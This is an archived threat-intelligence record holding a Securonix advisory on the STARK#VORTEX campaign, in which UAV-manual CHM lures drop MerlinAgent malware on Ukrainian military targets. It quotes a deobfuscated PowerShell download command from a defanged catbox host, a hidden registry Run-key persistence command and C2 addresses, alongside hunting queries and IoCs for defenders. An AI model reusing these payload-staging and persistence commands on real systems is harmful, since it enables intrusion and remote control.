{
	"id": "11254d8c-fe2d-43a6-bf92-9476a143797f",
	"created_at": "2026-04-06T00:13:53.383623Z",
	"updated_at": "2026-04-10T03:33:20.64681Z",
	"deleted_at": null,
	"sha1_hash": "4eb0b1544fecefa45d4170259146e94876bd68de",
	"title": "Threat Labs Security Advisory: New STARK#VORTEX Attack Campaign: Threat Actors Use Drone Manual Lures to Deliver MerlinAgent Payloads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8098566,
	"plain_text": "Threat Labs Security Advisory: New STARK#VORTEX Attack Campaign: Threat Actors Use Drone Manual Lures to Deliver MerlinAgent Payloads\r\nArchived: 2026-04-05 21:17:53 UTC\r\nBy Securonix Threat Research: D.Iuzvyk, T.Peck, O.Kolesnikov\r\nSept. 25, 2023, updated Sept. 27, 2023, updated Oct. 6, 2023\r\ntldr:\r\nSecuronix Threat Research recently discovered an attack campaign appearing to originate from the threat group UAC-0154 targeting victims using a Pilot-in-Command (PIC) Drone manual document lure to deliver malware.\r\nAs the war between Russia and Ukraine rages, the cyber warfare landscape between the two countries also continues to show no signs of slowing down. New tactics and malware variants continue to emerge as we’re entering the year-and-a-half mark of the conflict.\r\nOur team has identified an interesting campaign (tracked by Securonix as STARK#VORTEX), which is actively targeting Ukraine’s military. Since drones or unmanned aerial vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAV service manuals have begun to surface.\r\nLast month, the threat group tracked by the identifier UAC-0154 was identified using military-themed documents delivered via email to Ukrainian targets (@ukr.net). Today, it would appear that the group’s tactics have changed, along with some of the methods used to infect victims with MerlinAgent malware.\r\nAttack chain overview\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/\r\nPage 1 of 17\r\nThe lure file presents itself as a Microsoft Help file, or .chm file. 
The file in this case was named “Інфо про навчання по БПЛА для військових.v2.2.chm” which translates to “info on UAV training for the military”.\r\nMicrosoft help files are a common file format used to provide application support, guides and references.\r\nCode execution begins as soon as the user opens the document, through a malicious JavaScript code block embedded inside one of the HTML pages.\r\nObfuscated PowerShell code is then executed from the JavaScript code within the .chm file, which is used to contact a remote C2 server and download an obfuscated binary payload.\r\nThe payload is an obfuscated binary that gets XOR’d and decoded to produce a beacon payload for MerlinAgent malware. Once the payload establishes communication back to its C2 server, the attackers would have full control over the victim host.\r\nWhile the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods in order to evade detection. We’ll go over each stage in detail further down.\r\nInitial code execution\r\nThe malicious .chm file was intentionally weaponized to execute a PowerShell one-liner on the victim machine.\r\nMicrosoft help files have been used maliciously in the past, though today they are less common as Microsoft stopped supporting the .chm file format in 2007. 
They can, however, be opened and executed in modern Windows versions.\r\nHelp files such as the lure document used in the STARK#VORTEX campaign would be executed using the Windows binary hh.exe, which is launched automatically when a user runs the .chm file.\r\nAs you can see from the figure below, the help file would have no trouble evading antivirus and EDR detections as it scored 0/59 detections in VirusTotal.\r\nFigure 1: VirusTotal detections for Інфо про навчання по БПЛА для військових.v2.2.chm\r\nCode execution through a .chm file is a well-known technique and there are several online tools available for building one. It works by passing in special HTML parameters which can call a child process such as cmd.exe or powershell.exe, along with command line arguments.\r\nAs we mentioned previously, the lure document was themed as a drone or UAV manual. Examining its contents, we see instructions written in the Ukrainian language for a DJI Mavic 3 drone.\r\nFigure 2: lure document contents for Інфо про навчання по БПЛА для військових.v2.2.chm\r\nHelp file and JavaScript execution [T1059.007]\r\nSince Microsoft help files are essentially container files, they can be opened and analyzed using file archival software such as 7zip. In the case of Інфо про навчання по БПЛА для військових.v2.2.chm, we’re able to observe several HTML files contained within.\r\nFigure 3: Contents of Інфо про навчання по БПЛА для військових.v2.2.chm\r\nAfter examining the contents of page1.html, we found a huge JavaScript one-liner embedded into the HTML within \u003cscript\u003e\u003c/script\u003e tags. 
Its contents were heavily obfuscated; however, we observed it executing another obfuscated PowerShell script, which we’ll dive into next.\r\nFigure 4: Example of obfuscated JavaScript code found within page1.html\r\nPowerShell execution [T1059.001]\r\nThe .chm file executes cmd.exe along with the “/c start /min” arguments to call the PowerShell process, which executes inside a hidden window. The PowerShell code is heavily obfuscated in order to evade detections. Some obfuscation methods include Base64 encoding, GZIP compression, and char value substitutions.\r\nFigure 5: Stage 1, obfuscated PowerShell executed by Інфо про навчання по БПЛА для військових.v2.2.chm\r\nAfter deobfuscating the Base64-encoded blob, we find more obfuscated PowerShell code. This time some key information such as the C2 URL and payload names becomes visible. This is seen in the figure below.\r\nNext, we’ll clean this code up and go over it in detail to gain a better understanding of its purpose.\r\nFigure 6: Stage 2, obfuscated PowerShell executed by Інфо про навчання по БПЛА для військових.v2.2.chm\r\nWith the PowerShell code a bit more human-readable, it’s pretty clear what it’s doing. 
In general, the script downloads a payload from hxxps://files.catbox[.]moe/g1h7zr.bin, decodes and decrypts it, and saves it under the local AppData folder as SysctlHost\\ctlhost.exe.\r\nFigure 7: Deobfuscated PowerShell analysis — file download, directory setup\r\nThis first bit of the script establishes a few variables such as the C2 URL ($plUrl), binary path ($plPathSuffix), decryption key ($cryptPS) and the XOR mask size value ($xorMaskSize). The bulk of the code is stored inside the doS function, which is called at the end of the script.\r\nNext, the script performs several key functions:\r\n1. Constructs the target path.\r\n2. Checks if the executable file already exists at the defined path, returning -1 if it does.\r\n3. Ensures that the necessary directory exists, creating it if needed.\r\n4. Checks the success of directory creation, returning -2 if it fails.\r\nThe script then downloads the file from the C2 server. The command, as you can see, is heavily obfuscated; however, deobfuscating the PowerShell code produces the following download command:\r\n[System.Net.WebClient]::new().DownloadFile(‘hxxps://files.catbox[.]moe/g1h7zr.bin’, ”)\r\nThe command is then executed using an invoke expression (IEX).\r\nFurther down the script we find some interesting binary file manipulation code blocks, which can be seen in figure 8 below:\r\nFigure 8: Deobfuscated PowerShell — binary file decoding\r\nIn a nutshell, the downloaded binary file is decoded and renamed using values provided at the beginning of the script, as seen in figure 7.\r\nCompute the hash and fill the XOR mask:\r\n1. 
A SHA-256 hasher is initialized.\r\n2. The input string $cryptPS is hashed to produce an array, $sha.\r\n3. This hash is then used to populate the $xorMask array. If the mask requires more bytes than the initial hash provides, the hash of the previous hash is used in a chained fashion until the mask is completely filled.\r\nFile transformation using the XOR mask:\r\n1. File streams are opened:\r\n$f1 reads from an existing file at the path $p ($envAppData\\sysctlHost\\ctlhost.exe).\r\n$f2 writes to a new temporary file with the same name as $p but with a .tmp extension.\r\n2. The file at path $p is processed in chunks of up to 4096 bytes using a buffer $b.\r\n3. For each chunk:\r\nBytes are read into the buffer from $f1.\r\nEach byte in the buffer is XOR’d with the corresponding byte from the $xorMask.\r\nThe transformed bytes are then written to the temporary file using $f2.\r\n4. This process continues until the entire file has been read and transformed.\r\nNote: The outer while($false) is odd since it renders the entire subsequent code block ineffective. It could be a mistake by the attackers, or it could act as a placeholder for other binary files that would require its specific functionality.\r\nWith the file decoded into a variable, the next portion of the script then saves it over the original file after leveraging and then deleting a temporary file.\r\nFigure 9: Stage 3, deobfuscated PowerShell\r\nThe last bit of code takes a previously downloaded, encrypted and compressed file with a .tmp extension, decompresses its content, writes the decompressed content back to the original file, and deletes the .tmp file. 
The last portion of the script then executes the original file in a few different ways.\r\nThe PowerShell script appears to be written with several options and configurations in mind, hence the while($false) statement we mentioned earlier and the optional binary file arguments, which were set to “null” in this case.\r\nBinary file analysis\r\nThe Windows binary file downloaded is a 64-bit executable about 5 MB in size. Some additional binary information is highlighted in figure 10 below.\r\nFigure 10: ctlhost.exe — binary file overview\r\nUpon closer examination, it appears to be a binary executable generated by the MerlinAgent framework. Similar to Cobalt Strike and Sliver, MerlinAgent is an open source command and control framework available on GitHub.\r\nThe MerlinAgent framework is an open source C2 framework written in Go. It functions similarly to Cobalt Strike or Sliver: a server instance can be set up which builds its own binary payloads. Attackers can then distribute these payloads and incorporate them into their own malware stager or loader. MerlinAgent has a wide range of capabilities which include:\r\nEncrypted C2 communication using TLS\r\nRemote command shell\r\nModule support (such as Mimikatz)\r\nBinary support for exe or dll clients\r\nThe agent itself supports a wide range of command flags which blue team defenders can be on the lookout for:\r\nCommand Description\r\n-debug Enable debug output\r\n-host HTTP Host header\r\n-ja3 JA3 signature string (not the MD5 hash). 
Overrides -proto flag\r\n-killdate The date, as a Unix EPOCH timestamp, that the agent will quit running\r\n-maxretry The maximum amount of failed checkins before the agent will quit running\r\n-padding The maximum amount of data that will be randomly selected and appended to every message\r\n-proto Protocol for the agent to connect with\r\n-proxy Hardcoded proxy to use for http/1.1 traffic\r\n-psk Pre-Shared Key used to encrypt initial communications\r\n-skew Amount of skew, or variance, between agent checkins\r\n-sleep Time for agent to sleep\r\n-url Full URL for agent to connect to\r\n-useragent The HTTP User-Agent header string that Agent will use while sending traffic\r\n-v Enable verbose output\r\n-version Print the agent version and exit[1]\r\nMerlinAgent has been used by UAC-0154 in the past to target Ukrainian officials, and many TTPs are consistent with past activity.\r\nUpon execution, the MerlinAgent payload will immediately begin beaconing to listen.servemp3[.]com. It also establishes persistence in the registry by creating a new key called “ctlhost” located in “HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” with the contents “cmd.exe /c start /min %windir%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -command Start-Process -filepath “C:\\Users\\[REDACTED]\\Appdata\\Roaming\\sysctlHost\\ctlhost.exe” -WindowStyle Hidden”. 
This will execute the binary file every time the user logs into the system.\r\nOnce the process establishes a connection to the attacker’s C2 server, the attacker will have full control over the system.\r\nWrapping up…\r\nIt’s apparent that this attack was highly targeted towards the Ukrainian military, given the language of the document and its military theme.\r\nFiles and documents used in the attack chain are very capable of bypassing defenses, scoring 0 detections for the malicious .chm file. Typically, receiving a Microsoft help file over the internet would be considered unusual. However, the attackers framed the lure documents to appear as something an unsuspecting victim might expect to see in a help-themed document or file.\r\nC2 and infrastructure\r\nDuring the STARK#VORTEX campaign we observed the following network communication to C2 hosts.\r\nCommand and control from the MerlinAgent payload to the attacker’s C2 server used an encrypted channel over port 443. Request-related details will be provided in Appendix A below.\r\nC2 Address Description\r\ncatbox[.]moe Executable file stager location. Catbox is a legitimate file sharing service.\r\nlisten.servemp3[.]com (168.100.8[.]245) Beacon C2 URL from ctlhost.exe\r\nSecuronix recommendations and mitigations\r\nAlways be extra cautious downloading file attachments from posts or private messages. 
When it comes to prevention and detection, the Securonix Threat Research Team recommends:\r\nAvoid downloading files or attachments from untrusted sources, especially if the source was unsolicited\r\nMonitor common malware staging directories, especially “C:\\ProgramData” and other temporary locations such as the user’s local appdata folder, which was used in this attack campaign\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below\r\nMITRE ATT\u0026CK matrix\r\nTactic Technique\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nDefense Evasion\r\nT1112: Modify Registry\r\nT1218.001: System Binary Proxy Execution: Compiled HTML File\r\nT1562.001: Impair Defenses: Disable or Modify Tools\r\nCommand and Control\r\nT1105: Ingress Tool Transfer\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1219: Remote Access Software\r\nPersistence\r\nT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nAnalyzed file hashes\r\nFile Name SHA256 (IoC)\r\nІнфо про навчання по БПЛА для військових.v2.2.chm 68A224AD49F2BD3D82EF6FCF5B16472DD06FECFF816263925DFB9BAC91951B21\r\ng1h7zr.bin 46FA63AF33FB7A42D3F79ED81D38E5CADDA7D311B07B2306E917179948189C7A\r\nctlhost.exe 4659D371C9B6DB1687D6DD027E95563DA88A29378DE4F87DB19B267859D04D03\r\nSome examples of relevant Securonix provisional detections\r\nEDR-ALL-1032-RU\r\nEDR-ALL-1215-ERR, WEL-ALL-1186-ERR\r\nEDR-ALL-138-ERR\r\nPSH-ALL-228-RU\r\nPSH-ALL-316-RU\r\nSome 
examples of relevant hunting/Spotter queries (be sure to remove square brackets “[ ]”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND eventid = “13” AND eventtype = “SetValue” AND targetobject CONTAINS “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” AND (description CONTAINS “\\Appdata\\Local” OR description CONTAINS “\\Appdata\\Roaming”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “ -bxor”\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “IO.StreamReader” AND message CONTAINS “]::Decompress”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process Create” AND sourceprocessname ENDS WITH “hh.exe” AND (destinationprocessname ENDS WITH “cmd.exe” OR destinationprocessname ENDS WITH “powershell.exe”)\r\nindex = activity AND (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Proxy”) AND ((destinationhostname = “listen.servemp3[.]com” OR destinationhostname = “catbox[.]moe”) OR destinationaddress = “168.100.8[.]245”)\r\nReferences:\r\n1. Microsoft: .chm Help files\r\n2. Github: Nishang script modified for Kautilya\r\n3. Securonix Threat Research Knowledge Sharing Series: Hiding the PowerShell Execution Flow\r\n4. MerlinAgent: a new open-source tool for carrying out cyberattacks against state organizations of Ukraine (CERT-UA#6995, CERT-UA#7183)\r\n5. 
Documentation: Merlin Command and Control framework\r\nAppendix A\r\n“request”: {\r\n   “HOST”: “listen.servemp3[.]com”,\r\n   “ACCEPT-ENCODING”: “gzip”,\r\n   “server_conn”: “168.100.8[.]245”,\r\n   “AUTHORIZATION”: “Bearer eyJhbGc[REDACTED]UFQ”,\r\n   “CONTENT-LENGTH”: “1826”,\r\n   “CONTENT-TYPE”: “application/octet-stream; charset=utf-8”,\r\n   “USER-AGENT”: “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36”\r\n},\r\n“request_hex”: “fe 02 26 0c 00 fe 02 21[REDACTED]48 34 77 33 58 77 ”,\r\n“body_hex”: “fe 0c 40 0c 00 fe 0c 3b[REDACTED]74 4b 61 55 6b 65 69 78 56 78”,\r\n“method”: “POST”,\r\n},\r\nUpdate: The STARK#VORTEX Attack Campaign Continues as UAC-0154 Tactics Change\r\nUpdate Sept. 29, 2023: The STARK#VORTEX attack campaign surges on as the Securonix Threat Research team continues to monitor the skies for changes and new vectors. Currently, it would appear that the threat actors have shifted to a new staging domain while many of the TTPs have remained the same.\r\nThe naming scheme of the binary files has also changed. This time around, the MerlinAgent payload appears to be masquerading as the popular building/adventure game Minecraft. It would appear that the threat actors shifted gears into using Minecraft-themed C2 servers and payloads.\r\nThe lure document has also been retargeted. As you can see in the figure below, the document, now named “Confidential Offers.chm”, follows the same malicious pattern originally observed with the STARK#VORTEX campaign. 
Figure 1: Confidential Offers.chm lure document\r\nThe help file contains a single HTML file which executes the malicious JavaScript payload. The HTML file is titled “Міжнародні партнери”, which translates from Ukrainian to “International partners”. When opened, the content of the lure file simply contains a few company logos.\r\nLike the original attack campaign, the latest version contains a highly obfuscated JavaScript code block which calls and executes another obfuscated PowerShell one-liner.\r\nFigure 2: Obfuscated JavaScript sample executed by Confidential Offers.chm\r\nThe PowerShell script downloads a binary MerlinAgent payload from hxxps://shorturl[.]at/abPU5, which redirects to hxxps://files.catbox[.]moe/sbjchf.mod. The encoded payload is decoded and then executed in almost the same fashion as we saw before.\r\nThe binary payload which gets downloaded and executed is named “minecraft.exe” and is placed at “%appdata%/local/games/minecraft.exe”, and the C2 beaconing address is listen.serveminecraft[.]net. Why the attackers chose to masquerade as Minecraft is unclear, other than the fact that it is a wildly popular game. This does suggest that it was probably not intended for business systems, where games would normally not be found.\r\nWrapping up…\r\nToday, we won’t go too deep into the rest of the attack chain as it is almost identical to what we first encountered last week. 
The original STARK#VORTEX write-up contains a much more in-depth analysis. Updated IoCs and Seeder hunting queries can be found below.\r\nC2 and infrastructure\r\nAnalyzed file hashes\r\nSome examples of relevant Securonix provisional detections\r\nEDR-ALL-1032-RU\r\nEDR-ALL-1215-ERR, WEL-ALL-1186-ERR\r\nEDR-ALL-138-ERR\r\nPSH-ALL-228-RU\r\nPSH-ALL-316-RU\r\nRelevant hunting/Spotter queries (be sure to remove square brackets “[ ]”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND baseeventid = “13” AND eventtype = “SetValue” AND targetobject CONTAINS “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” AND (description CONTAINS “\\Appdata\\Local” OR description CONTAINS “\\Appdata\\Roaming”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “ -bxor”\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “IO.StreamReader” AND message CONTAINS “]::Decompress”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process Create” AND sourceprocessname = “hh.exe” AND (destinationprocessname = “cmd.exe” OR destinationprocessname = “powershell.exe”)\r\nindex = activity AND (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Proxy”) AND ((destinationhostname = “listen.serveminecraft[.]net” OR destinationhostname = “catbox[.]moe”) OR destinationaddress = “168.100.8[.]245”)\r\nReferences:\r\n1. New STARK#VORTEX Attack Campaign: Threat Actors Use Drone Manual Lures to Deliver MerlinAgent Payloads\r\n2. Microsoft: .chm Help files\r\n3. Github: Nishang script modified for Kautilya\r\n4. 
Securonix Threat Research Knowledge Sharing Series: Hiding the PowerShell Execution Flow\r\n5. MerlinAgent: a new open-source tool for carrying out cyberattacks against state organizations of Ukraine (CERT-UA#6995, CERT-UA#7183)\r\n6. Documentation: Merlin Command and Control framework\r\nSource: https://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/"
	],
	"report_names": [
		"threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b1acb4fd-d57f-4b28-818e-d3ec282d43d5",
			"created_at": "2024-09-20T02:00:04.580908Z",
			"updated_at": "2026-04-10T02:00:03.698967Z",
			"deleted_at": null,
			"main_name": "UAC-0154",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0154",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434433,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4eb0b1544fecefa45d4170259146e94876bd68de.pdf",
		"text": "https://archive.orkl.eu/4eb0b1544fecefa45d4170259146e94876bd68de.txt",
		"img": "https://archive.orkl.eu/4eb0b1544fecefa45d4170259146e94876bd68de.jpg"
	}
}